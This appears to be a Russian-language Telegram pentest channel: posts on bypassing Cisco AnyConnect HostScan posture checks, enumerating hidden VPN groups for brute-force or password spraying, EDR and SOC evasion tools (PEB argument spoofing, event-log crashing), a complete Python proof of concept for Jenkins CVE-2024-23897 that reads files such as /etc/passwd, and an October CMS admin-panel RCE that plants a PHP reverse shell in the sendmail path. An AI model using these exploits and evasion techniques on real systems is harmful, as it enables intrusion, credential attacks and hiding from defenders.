hostscan2.png
234.9 KB
Иногда при пентесте есть валидные креды + есть cisco vpn с модулем hostscan.
Модуль Hostscan используют для проведения проверок на подключаемых устройствах, например что устройство корпоративное (введенно в домен), есть антивирус, стоят обновления и т.д.
Но что делать простому пентестеру если в инфру все таки хочется?
перейти по адресу: https://адрес/CACHE/sdesktop/data.xml и если нам повезет увидеть проводимые модулем hostscan проверки, как на скрине.
что делать если файла нет а проверки есть? запустить process monitor с фильтром на "process name=cscan.exe" и подключиться через клиент anyconnect, ввести любые креды и смотреть что делает приложение.
Изначально приложение соберет информацию об ОС, обновлениях и тд. После ввода любых кред оно начнет "ту самую" проверку(смотреть скрин 2).
Что нам остается делать? правильно - выполнить условия проверки)) имя windows ad домена можно найти, файлы и каталоги можно создать.
Информация не новшество, но пока не столкнешься - не вспомнишь.
Есть ньюанс с проверкой наличия процесса, тут еще нужно подумать.
Модуль Hostscan используют для проведения проверок на подключаемых устройствах, например что устройство корпоративное (введенно в домен), есть антивирус, стоят обновления и т.д.
Но что делать простому пентестеру если в инфру все таки хочется?
перейти по адресу: https://адрес/CACHE/sdesktop/data.xml и если нам повезет увидеть проводимые модулем hostscan проверки, как на скрине.
что делать если файла нет а проверки есть? запустить process monitor с фильтром на "process name=cscan.exe" и подключиться через клиент anyconnect, ввести любые креды и смотреть что делает приложение.
Изначально приложение соберет информацию об ОС, обновлениях и тд. После ввода любых кред оно начнет "ту самую" проверку(смотреть скрин 2).
Что нам остается делать? правильно - выполнить условия проверки)) имя windows ad домена можно найти, файлы и каталоги можно создать.
Информация не новшество, но пока не столкнешься - не вспомнишь.
Есть ньюанс с проверкой наличия процесса, тут еще нужно подумать.
👍9👎1
Продолжаем эпопею с cisco vpn.
Есть такая штука как скрытые группы, это группы различных устройств, админские, тестовые и т.п. В данных группах могут быть более широкие доступы. Эти группы не отображаются при подключении и можно к ним подключиться только явно указав в строке подключения клиента, например vpn.company.ru/test_users. К тому же, некоторые компании скрывают вообще веб-интерфейс входа в cisco vpn.
К счастью, название этих групп можно определить перебором. Для определения группы достаточно отправить Post запрос к корню cisco vpn и если код ответа будет равен 200, то профиль существует.
Запрос:
POST /test HTTP/1.1 где test название группы. При наличии группы, в ответе будет содержимое:
<html><noscript>document.location.replace('/+CSCOE+/logon.html?tgroup=test')</noscript></html>
Пример результатов перебора на скриншоте, было получено скрытое из интерфейса имя группы test. Зная имена скрытых групп, можно попробовать атаки методом брутфорса/спрея или проверить возможность входа в vpn с использованием тех учетных записей, которые у вас уже есть.
Есть такая штука как скрытые группы, это группы различных устройств, админские, тестовые и т.п. В данных группах могут быть более широкие доступы. Эти группы не отображаются при подключении и можно к ним подключиться только явно указав в строке подключения клиента, например vpn.company.ru/test_users. К тому же, некоторые компании скрывают вообще веб-интерфейс входа в cisco vpn.
К счастью, название этих групп можно определить перебором. Для определения группы достаточно отправить Post запрос к корню cisco vpn и если код ответа будет равен 200, то профиль существует.
Запрос:
POST /test HTTP/1.1 где test название группы. При наличии группы, в ответе будет содержимое:
<html><noscript>document.location.replace('/+CSCOE+/logon.html?tgroup=test')</noscript></html>
Пример результатов перебора на скриншоте, было получено скрытое из интерфейса имя группы test. Зная имена скрытых групп, можно попробовать атаки методом брутфорса/спрея или проверить возможность входа в vpn с использованием тех учетных записей, которые у вас уже есть.
🔥7👍3
temp.txt
421 B
маленький пример списка для енума, все зависит от вашей фантазии. Можно взять список групп который вам виден и к ним добавить "-test", можно взять название компании и сокращения добавляя префиксы it,test,admin и т.д.
🔥6
Опять таки про cisco vpn...
наблюдаю историю когда за одним доменом vpn.company.ru находятся две разные cisco asa c разными настройками.
- У каждой асы свой ssl сертификат, в котором раскрывается серийный номер в поле subject: serialNumber.
- При двух одинаковых get запросах serialNumber разный в ответе....т.е. циски реально две.
- У домена vpn.company.ru две А записи с разными ip адресами.
Одна из цисок запускает модуль posture, а другая нет. То есть одна нас впускает в инфраструктуру без проверок. Как то так случилось что админы настроили циски по разному.
наблюдаю историю когда за одним доменом vpn.company.ru находятся две разные cisco asa c разными настройками.
- У каждой асы свой ssl сертификат, в котором раскрывается серийный номер в поле subject: serialNumber.
- При двух одинаковых get запросах serialNumber разный в ответе....т.е. циски реально две.
- У домена vpn.company.ru две А записи с разными ip адресами.
Одна из цисок запускает модуль posture, а другая нет. То есть одна нас впускает в инфраструктуру без проверок. Как то так случилось что админы настроили циски по разному.
👍2
поискал в интернетах чужие проверки posture hostscan, самые упоротые в amazon. Что люди только не проверяют ) как можно заметить, меньше всего проверок на linux и macos
👍3
Бывает такое, только что то придумаешь, только соберешься написать, а это за 3 дня до тебя уже кто то написал.
Интерактивная оболочка с подделкой аргументов командной строки (PEB Spoofing) - https://github.com/itaymigdal/LOLSpoof
Классная штука для байпаса множества детектов socами и иногда edr и av.
Интерактивная оболочка с подделкой аргументов командной строки (PEB Spoofing) - https://github.com/itaymigdal/LOLSpoof
Классная штука для байпаса множества детектов socами и иногда edr и av.
GitHub
GitHub - itaymigdal/LOLSpoof: An interactive shell to spoof some LOLBins command line
An interactive shell to spoof some LOLBins command line - itaymigdal/LOLSpoof
Немного букв про PEB PA Spoofing и чем он нам поможет
https://telegra.ph/Process-Argument-Spoofing-v-PEB-i-detekt-davaj-dosvidaniya-01-22
https://telegra.ph/Process-Argument-Spoofing-v-PEB-i-detekt-davaj-dosvidaniya-01-22
Telegraph
Process Argument Spoofing в PEB и детект "давай досвидания"
Про спуфинг аргументов процессов написано очень много и разжевано досконально. Вкратце: Process Environment Block (PEB)содержит в себе различную информацию о процессе. Раздел RTL_USER_PROCESS_PARAMETERS в PEB содержит атрибут CommandLine который определен…
🔥5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
От имени любого пользователя можно аварийно завершить службу журнала событий Windows.
https://github.com/floesen/EventLogCrasher
#redteam #bypass #maldev
https://github.com/floesen/EventLogCrasher
#redteam #bypass #maldev
GitHub
GitHub - floesen/EventLogCrasher
Contribute to floesen/EventLogCrasher development by creating an account on GitHub.
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👎2❤1
true_security
Где найти команду сбер страхования? нужно показать интересные вещи...
найден, всем спасибо
👍3
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
GitHub
GitHub - FalconForceTeam/SOAPHound: SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active…
SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol. - FalconForceTeam/SOAPHound
🔥3
Нолик от нолика (я cve не нашел и метод работает на стенде разработчика с последней версией - 3.5.0).
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
после сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
php -r '$sock=fsockopen("ip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'; /usr/sbin/sendmail -t -iпосле сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
🔥16👍3